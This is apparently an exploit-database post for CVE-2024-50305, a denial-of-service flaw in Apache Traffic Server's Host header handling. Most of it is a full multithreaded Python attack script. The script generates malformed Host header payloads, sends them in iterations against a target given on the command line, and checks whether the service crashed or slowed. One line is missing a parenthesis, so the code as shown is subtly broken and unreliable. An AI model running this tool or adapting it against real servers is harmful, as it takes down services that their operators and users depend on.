============================================================================================================================================= | # Title : Apache Traffic Server Host Header Denial of Service Vulnerability | | # Author : indoushka | | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) | | # Vendor : https://trafficserver.apache.org/ | ============================================================================================================================================= [+] Summary : A denial-of-service (DoS) vulnerability identified as CVE-2024-50305 affects Apache Traffic Server due to improper handling and validation of malformed or unexpected Host header values in incoming HTTP requests. An attacker may send specially crafted requests containing abnormal, oversized, or non-standard Host header values. Under certain conditions, this may lead to service instability, excessive resource consumption, unexpected connection termination, or potential process crashes, resulting in temporary denial of service. The issue highlights insufficient input validation within HTTP request parsing logic. Proper boundary checks, strict header validation, and adherence to RFC standards are recommended to mitigate the risk [+] POC : #!/usr/bin/env python3 import socket import sys import time import argparse import threading import ssl import ipaddress import random import string from concurrent.futures import ThreadPoolExecutor, as_completed from typing import List, Tuple, Optional, Dict, Any from enum import Enum from dataclasses import dataclass, field from contextlib import contextmanager import logging from collections import Counter logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', datefmt='%H:%M:%S' ) logger = logging.getLogger('cve_2024_50305') class ServiceState(Enum): """Possible service states""" UP = "up" DOWN = "down" UNKNOWN = "unknown" FILTERED = "filtered" SLOW = "slow" ERROR = "error" class Protocol(Enum): """Connection protocol""" HTTP1 = "http/1.1" HTTP2 = "http/2" UNKNOWN = "unknown" class CrashConfidence(Enum): """Confidence level in crash detection""" HIGH = "high" MEDIUM = "medium" LOW = "low" NONE = "none" @dataclass class RequestResult: """Result of a single request""" payload: str response_time: float status_code: Optional[int] = None crash_confidence: CrashConfidence = CrashConfidence.NONE error: Optional[str] = None timeout_occurred: bool = False bytes_received: int = 0 connection_reset: bool = False @dataclass class Statistics: """Attack statistics - optimized to avoid memory growth""" total_requests: int = 0 crashes_high: int = 0 crashes_medium: int = 0 crashes_low: int = 0 timeouts: int = 0 connection_refused: int = 0 connection_reset: int = 0 successful: int = 0 errors: int = 0 status_codes: Counter = field(default_factory=Counter) # Response time stats - stored compactly response_time_sum: float = 0.0 response_time_count: int = 0 response_time_min: float = float('inf') response_time_max: float = 0.0 class HTTPResponseParser: """HTTP response parser""" @staticmethod def parse_status_line(data: bytes) -> Tuple[Optional[int], Optional[Protocol]]: """ Parses the first status line of an HTTP response """ if not data: return None, None end_of_line = data.find(b'\r\n') if end_of_line == -1: return None, None first_line = data[:end_of_line].decode('ascii', errors='ignore') parts = first_line.split(' ') if len(parts) < 2: return None, None protocol = Protocol.UNKNOWN if parts[0].startswith('HTTP/1'): protocol = Protocol.HTTP1 elif parts[0].startswith('HTTP/2'): protocol = Protocol.HTTP2 try: status_code = int(parts[1]) return status_code, protocol except (ValueError, IndexError): return None, protocol class TargetResolver: """Resolves target addresses with IPv4/IPv6 support""" def __init__(self, prefer_ipv6: bool = False): self.prefer_ipv6 = prefer_ipv6 self._cache = {} def _is_ip_address(self, target: str) -> Tuple[bool, Optional[int]]: """ Checks if the text is an IP address and returns its family Returns: (is_ip, family) """ try: ip_obj = ipaddress.ip_address(target) if ip_obj.version == 6: return True, socket.AF_INET6 else: return True, socket.AF_INET except ValueError: return False, None def resolve(self, target: str, port: int) -> Optional[Tuple[str, int, int]]: """ Resolves target to (ip, port, family) Returns: (ip, port, socket_family) or None on failure """ cache_key = f"{target}:{port}:{self.prefer_ipv6}" if cache_key in self._cache: return self._cache[cache_key] is_ip, ip_family = self._is_ip_address(target) if is_ip: result = (target, port, ip_family) self._cache[cache_key] = result return result if self.prefer_ipv6: families = [socket.AF_INET6, socket.AF_INET] else: families = [socket.AF_INET, socket.AF_INET6] for family in families: try: addrinfo = socket.getaddrinfo( target, port, family=family, type=socket.SOCK_STREAM, proto=socket.IPPROTO_TCP ) if addrinfo: _, _, _, _, sockaddr = addrinfo[0] if family == socket.AF_INET6: ip, port, flowinfo, scopeid = sockaddr else: ip, port = sockaddr result = (ip, port, family) self._cache[cache_key] = result logger.debug(f"Resolved {target} -> {ip} ({'IPv6' if family == socket.AF_INET6 else 'IPv4'})") return result except socket.gaierror: continue except Exception as e: logger.debug(f"Error resolving {target} using family {family}: {e}") continue logger.error(f"Failed to resolve {target}") return None class ServiceChecker: """Accurate service status checker""" def __init__(self, timeout: float = 5, max_header_size: int = 8192): self.timeout = timeout self.max_header_size = max_header_size @contextmanager def _create_socket(self, family: int, use_ssl: bool = False, hostname: str = None): """Creates a socket with SSL support""" sock = socket.socket(family, socket.SOCK_STREAM) sock.settimeout(self.timeout) try: if use_ssl: context = ssl.create_default_context() context.check_hostname = False context.verify_mode = ssl.CERT_NONE is_ip = False if hostname: try: ipaddress.ip_address(hostname) is_ip = True except ValueError: pass server_hostname = hostname if hostname and not is_ip else None sock = context.wrap_socket(sock, server_hostname=server_hostname) yield sock finally: try: sock.close() except: pass def _is_valid_http_response(self, data: bytes) -> Tuple[bool, Optional[int]]: """Checks validity of HTTP response and extracts status code""" status_code, _ = HTTPResponseParser.parse_status_line(data) return status_code is not None, status_code def check(self, ip: str, port: int, family: int, hostname: str = None, use_ssl: bool = False) -> Tuple[ServiceState, float, Optional[int]]: """ Performs a detailed service check Returns: (State, Response Time, Status Code) """ start_time = time.monotonic() try: with self._create_socket(family, use_ssl, hostname or ip) as sock: host_header = hostname or ip if family == socket.AF_INET6 and ':' in ip and not ip.startswith('['): host_header = f"[{ip}]" request = ( f"GET / HTTP/1.1\r\n" f"Host: {host_header}\r\n" f"User-Agent: CVE-2024-50305-Checker/1.0\r\n" f"Accept: text/html,application/xhtml+xml\r\n" f"Accept-Language: en-US,en;q=0.9\r\n" f"Connection: close\r\n" f"\r\n" ).encode() if family == socket.AF_INET6: sock.connect((ip, port, 0, 0)) else: sock.connect((ip, port)) sock.sendall(request) response = b"" while True: try: chunk = sock.recv(self.max_header_size) if not chunk: break response += chunk if b'\r\n\r\n' in response: break if len(response) > self.max_header_size: break except socket.timeout: break response_time = time.monotonic() - start_time is_valid, status_code = self._is_valid_http_response(response) if is_valid and status_code is not None: if 200 <= status_code < 600: return ServiceState.UP, response_time, status_code else: return ServiceState.UP, response_time, status_code elif response: return ServiceState.UNKNOWN, response_time, None else: return ServiceState.UNKNOWN, response_time, None except socket.timeout: return ServiceState.SLOW, self.timeout, None except ConnectionRefusedError: return ServiceState.DOWN, 0, None except ConnectionResetError: return ServiceState.UNKNOWN, time.monotonic() - start_time, None except socket.gaierror: return ServiceState.ERROR, 0, None except Exception as e: logger.debug(f"Check Error: {e}") return ServiceState.ERROR, 0, None class RequestSender: """Sends malicious requests with detailed result analysis""" def __init__(self, timeout: float = 5, max_response_size: int = 4096): self.timeout = timeout self.max_response_size = max_response_size @contextmanager def _create_socket(self, family: int): """Creates a socket""" sock = socket.socket(family, socket.SOCK_STREAM) sock.settimeout(self.timeout) try: yield sock finally: try: sock.close() except: pass def _evaluate_crash_confidence(self, result: RequestResult, normal_behavior: Dict) -> CrashConfidence: """ Evaluates crash detection confidence based on several factors """ if result.connection_reset: return CrashConfidence.HIGH if result.timeout_occurred and result.bytes_received == 0: return CrashConfidence.MEDIUM if result.bytes_received == 0 and not result.error: return CrashConfidence.LOW return CrashConfidence.NONE def send(self, ip: str, port: int, family: int, host_payload: str, baseline_time: float = 1.0) -> RequestResult: """ Sends a malicious request with accurate result analysis Args: baseline_time: Normal service response time """ result = RequestResult(payload=host_payload, response_time=0.0) start_time = time.monotonic() try: with self._create_socket(family) as sock: try: if family == socket.AF_INET6: sock.connect((ip, port, 0, 0)) else: sock.connect((ip, port)) except ConnectionRefusedError: result.error = "connection_refused" result.response_time = time.monotonic() - start_time return result try: encoded_host = host_payload.encode('utf-8') except UnicodeEncodeError: encoded_host = host_payload.encode('ascii', errors='replace') request = ( b"GET / HTTP/1.1\r\n" b"Host: " + encoded_host + b"\r\n" b"User-Agent: CVE-2024-50305/1.0\r\n" b"Accept: */*\r\n" b"Connection: close\r\n" b"\r\n" ) try: sock.sendall(request) except ConnectionResetError: result.connection_reset = True result.response_time = time.monotonic() - start_time result.crash_confidence = CrashConfidence.HIGH return result except BrokenPipeError: result.connection_reset = True result.response_time = time.monotonic() - start_time result.crash_confidence = CrashConfidence.HIGH response = b"" try: while True: try: chunk = sock.recv(4096) if not chunk: break response += chunk if len(response) > self.max_response_size: break except socket.timeout: result.timeout_occurred = True break except ConnectionResetError: result.connection_reset = True result.crash_confidence = CrashConfidence.HIGH result.response_time = time.monotonic() - start_time result.bytes_received = len(response) if response: status_code, _ = HTTPResponseParser.parse_status_line(response) result.status_code = status_code if status_code is not None: result.crash_confidence = CrashConfidence.NONE else: result.crash_confidence = CrashConfidence.LOW if result.crash_confidence == CrashConfidence.NONE: result.crash_confidence = self._evaluate_crash_confidence(result, {}) except Exception as e: result.error = str(e) result.response_time = time.monotonic() - start_time return result class PayloadGenerator: """Generates malicious Host values""" BASE_PAYLOADS = [ ":", "::", "[::1]", "", "\0", "localhost:8080:extra", "host\x00injection", ] SPECIAL_CHARS = list(string.punctuation + string.whitespace) @classmethod def generate(cls, count: int = 30) -> List[str]: """Generates a list of payloads""" count = max(10, min(count, 100)) payloads = set(cls.BASE_PAYLOADS) for length in [100, 500, 1000, 2000, 5000]: if len(payloads) < count: payloads.add('A' * length) payloads.add('B' * length) random_needed = count - len(payloads) if random_needed > 0: for _ in range(random_needed): length = random.randint(5, 50) random_payload = ''.join(random.choices(cls.SPECIAL_CHARS, k=length)) payloads.add(random_payload) unicode_samples = ["🚀", "测试", "αβγ", "★", "🌍"] payloads.update(unicode_samples[:max(0, count - len(payloads))]) return list(payloads)[:count] class StatisticsCollector: """Thread-safe statistics collection with memory control""" def __init__(self, max_response_times: int = 1000): self.lock = threading.Lock() self.stats = Statistics() self.max_response_times = max_response_times self._response_times_sample = [] # Limited sample for analysis def add_result(self, result: RequestResult): """Adds a result in a thread-safe manner""" with self.lock: self.stats.total_requests += 1 if result.crash_confidence == CrashConfidence.HIGH: self.stats.crashes_high += 1 elif result.crash_confidence == CrashConfidence.MEDIUM: self.stats.crashes_medium += 1 elif result.crash_confidence == CrashConfidence.LOW: self.stats.crashes_low += 1 if result.error == "connection_refused": self.stats.connection_refused += 1 elif result.connection_reset: self.stats.connection_reset += 1 elif result.error: self.stats.errors += 1 if result.timeout_occurred: self.stats.timeouts += 1 if result.status_code is not None: self.stats.successful += 1 self.stats.status_codes[result.status_code] += 1 if result.response_time > 0: self.stats.response_time_sum += result.response_time self.stats.response_time_count += 1 self.stats.response_time_min = min(self.stats.response_time_min, result.response_time) self.stats.response_time_max = max(self.stats.response_time_max, result.response_time) if len(self._response_times_sample) < self.max_response_times: self._response_times_sample.append(result.response_time) def get_stats(self) -> Statistics: """Gets a copy of the statistics""" with self.lock: stats_copy = Statistics( total_requests=self.stats.total_requests, crashes_high=self.stats.crashes_high, crashes_medium=self.stats.crashes_medium, crashes_low=self.stats.crashes_low, timeouts=self.stats.timeouts, connection_refused=self.stats.connection_refused, connection_reset=self.stats.connection_reset, successful=self.stats.successful, errors=self.stats.errors, status_codes=self.stats.status_codes.copy(), response_time_sum=self.stats.response_time_sum, response_time_count=self.stats.response_time_count, response_time_min=self.stats.response_time_min, response_time_max=self.stats.response_time_max ) return stats_copy def get_average_response_time(self) -> float: """Calculates average response time""" if self.stats.response_time_count > 0: return self.stats.response_time_sum / self.stats.response_time_count return 0.0 class CVE202450305Exploit: """Main exploit class""" def __init__(self, target: str, port: int = 80, threads: int = 5, timeout: float = 5, prefer_ipv6: bool = False, use_ssl: bool = False, rate_limit: float = 0.1): if not 1 <= port <= 65535: raise ValueError(f"Invalid port number: {port}") if threads < 1 or threads > 100: raise ValueError(f"Thread count must be between 1 and 100") self.target = target self.port = port self.threads = threads self.timeout = timeout self.prefer_ipv6 = prefer_ipv6 self.use_ssl = use_ssl self.rate_limit = rate_limit self.resolver = TargetResolver(prefer_ipv6) self.checker = ServiceChecker(timeout) self.sender = RequestSender(timeout) self.stats = StatisticsCollector() self.target_ip = None self.target_family = None self.baseline_state = ServiceState.UNKNOWN self.baseline_time = 1.0 # Default value self.baseline_status = None self.is_ip_target = False def initialize(self) -> bool: """Initializes exploit and resolves target""" logger.info(f"Initializing exploit for target {self.target}:{self.port}") resolved = self.resolver.resolve(self.target, self.port) if not resolved: logger.error("Failed to resolve target") return False self.target_ip, _, self.target_family = resolved try: ipaddress.ip_address(self.target) self.is_ip_target = True except ValueError: self.is_ip_target = False logger.info(f"Target resolved: {self.target_ip} " f"({'IPv6' if self.target_family == socket.AF_INET6 else 'IPv4'})") logger.info("Performing baseline service check...") state, resp_time, status = self.checker.check( self.target_ip, self.port, self.target_family, hostname=self.target if not self.is_ip_target else None, use_ssl=self.use_ssl ) self.baseline_state = state if resp_time > 0: self.baseline_time = resp_time self.baseline_status = status if state == ServiceState.UP: logger.info(f" Service is UP (Code: {status}, Time: {resp_time:.3f}s)") return True elif state == ServiceState.SLOW: logger.warning(f" Service is SLOW (Time: {resp_time:.3f}s)") return True elif state == ServiceState.UNKNOWN: logger.warning(f" Service status is UNKNOWN") return True else: logger.error(f" Service is NOT running: {state.value}") return False def _process_payload_chunk(self, payloads: List[str], iteration: int, chunk_idx: int) -> List[RequestResult]: """Processes a subset of payloads""" results = [] with ThreadPoolExecutor(max_workers=self.threads) as executor: future_to_payload = {} for payload in payloads: if self.rate_limit > 0: time.sleep(self.rate_limit) future = executor.submit( self.sender.send, self.target_ip, self.port, self.target_family, payload, self.baseline_time ) future_to_payload[future] = payload for future in as_completed(future_to_payload): try: result = future.result(timeout=self.timeout + 2) results.append(result) self.stats.add_result(result) if result.crash_confidence == CrashConfidence.HIGH: logger.info(f" HIGH confidence crash: {repr(result.payload)[:50]}...") elif result.crash_confidence == CrashConfidence.MEDIUM: logger.debug(f" MEDIUM confidence: {repr(result.payload)[:50]}...") elif result.connection_reset: logger.debug(f" Connection reset: {repr(result.payload)[:50]}...") elif result.timeout_occurred: logger.debug(f" Timeout: {repr(result.payload)[:50]}...") except Exception as e: logger.error(f"Error processing result: {e}") return results def run(self, payload_count: int = 30, iterations: int = 3) -> Tuple[bool, Statistics]: """ Executes the attack Returns: (Exploit_Success, Statistics) """ logger.info("=" * 60) logger.info(" CVE-2024-50305 - Apache Traffic Server DoS Exploit") logger.info("=" * 60) logger.info(f"Target: {self.target} ({self.target_ip}:{self.port})") logger.info(f"Protocol: {'HTTPS' if self.use_ssl else 'HTTP'}") logger.info(f"Threads: {self.threads}, Timeout: {self.timeout}s") logger.info(f"Rate limit: {self.rate_limit}s") logger.info(f"Payloads: {payload_count}, Iterations: {iterations}") logger.info("=" * 60) payloads = PayloadGenerator.generate(payload_count) logger.info(f" Generated {len(payloads)} malicious Host values") all_results = [] for iteration in range(iterations): logger.info(f"\n Iteration {iteration + 1}/{iterations}") chunk_size = max(1, len(payloads) chunks = [payloads[i:i+chunk_size] for i in range(0, len(payloads), chunk_size)] for chunk_idx, chunk in enumerate(chunks): logger.debug(f" Processing chunk {chunk_idx + 1}/{len(chunks)}") results = self._process_payload_chunk(chunk, iteration, chunk_idx) all_results.extend(results) stats = self.stats.get_stats() logger.info(f" Progress: {stats.total_requests}/{iterations * len(payloads)} " f"(High: {stats.crashes_high}, Med: {stats.crashes_medium})") if chunk_idx < len(chunks) - 1: time.sleep(1) final_stats = self.stats.get_stats() avg_time = self.stats.get_average_response_time() logger.info("\n" + "=" * 60) logger.info(" Final Statistics:") logger.info(f" Total Requests: {final_stats.total_requests}") logger.info(f" HIGH confidence crashes: {final_stats.crashes_high}") logger.info(f" MEDIUM confidence crashes: {final_stats.crashes_medium}") logger.info(f" LOW confidence crashes: {final_stats.crashes_low}") logger.info(f" Timeouts: {final_stats.timeouts}") logger.info(f" Connection resets: {final_stats.connection_reset}") logger.info(f" Connection refused: {final_stats.connection_refused}") logger.info(f" Successful responses: {final_stats.successful}") if final_stats.status_codes: logger.info(f" Status Codes: {dict(final_stats.status_codes)}") if final_stats.response_time_count > 0: logger.info(f" Response Time - Avg: {avg_time:.3f}s") logger.info(f" Response Time - Min: {final_stats.response_time_min:.3f}s") logger.info(f" Response Time - Max: {final_stats.response_time_max:.3f}s") logger.info("=" * 60) logger.info("\n Verifying exploit success...") time.sleep(3) post_state, post_time, post_status = self.checker.check( self.target_ip, self.port, self.target_family, hostname=self.target if not self.is_ip_target else None, use_ssl=self.use_ssl ) success = False reasons = [] if final_stats.crashes_high > 0: reasons.append(f"Detected {final_stats.crashes_high} HIGH confidence crashes") success = True if final_stats.crashes_medium > 3: reasons.append(f"Detected {final_stats.crashes_medium} MEDIUM confidence crashes") success = True if self.baseline_state == ServiceState.UP: if post_state == ServiceState.DOWN: reasons.append("Service stopped after attack") success = True elif post_state == ServiceState.SLOW and self.baseline_time > 0: slowdown_ratio = post_time / self.baseline_time if slowdown_ratio > 3: reasons.append(f"Significant service slowdown ({slowdown_ratio:.1f}x)") success = True if success: logger.info("Exploit Successful!") for reason in reasons: logger.info(f" • {reason}") return True, final_stats else: logger.info(" Exploit Failed") if reasons: logger.info(f" ({', '.join(reasons)})") else: logger.info(" No evidence of vulnerability found") return False, final_stats def main(): """Main function""" parser = argparse.ArgumentParser( description="CVE-2024-50305 - Apache Traffic Server DoS Exploit", formatter_class=argparse.RawDescriptionHelpFormatter ) parser.add_argument("target", help="Target address (IP or domain)") parser.add_argument("-p", "--port", type=int, default=80, help="Target port (1-65535, default: 80)") parser.add_argument("-t", "--threads", type=int, default=5, help="Thread count (1-100, default: 5)") parser.add_argument("--timeout", type=float, default=5, help="Connection timeout in seconds (default: 5)") parser.add_argument("--ipv6", action="store_true", help="Prefer IPv6") parser.add_argument("--ssl", action="store_true", help="Use HTTPS/SSL") parser.add_argument("--rate-limit", type=float, default=0.05, help="Delay between requests in seconds (default: 0.05)") parser.add_argument("-c", "--payloads", type=int, default=30, help="Number of payloads to test (10-100, default: 30)") parser.add_argument("-i", "--iterations", type=int, default=3, help="Number of iterations (default: 3)") parser.add_argument("-v", "--verbose", action="store_true", help="Show detailed information") args = parser.parse_args() if args.verbose: logger.setLevel(logging.DEBUG) try: exploit = CVE202450305Exploit( target=args.target, port=args.port, threads=args.threads, timeout=args.timeout, prefer_ipv6=args.ipv6, use_ssl=args.ssl, rate_limit=args.rate_limit ) if not exploit.initialize(): sys.exit(2) success, stats = exploit.run( payload_count=args.payloads, iterations=args.iterations ) sys.exit(0 if success else 1) except KeyboardInterrupt: logger.info("\nAttack stopped by user") sys.exit(2) except ValueError as e: logger.error(f"Input Error: {e}") sys.exit(2) except Exception as e: logger.error(f"Unexpected Error: {e}") if args.verbose: import traceback traceback.print_exc() sys.exit(2) if __name__ == "__main__": main() Greetings to :====================================================================== jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)| ====================================================================================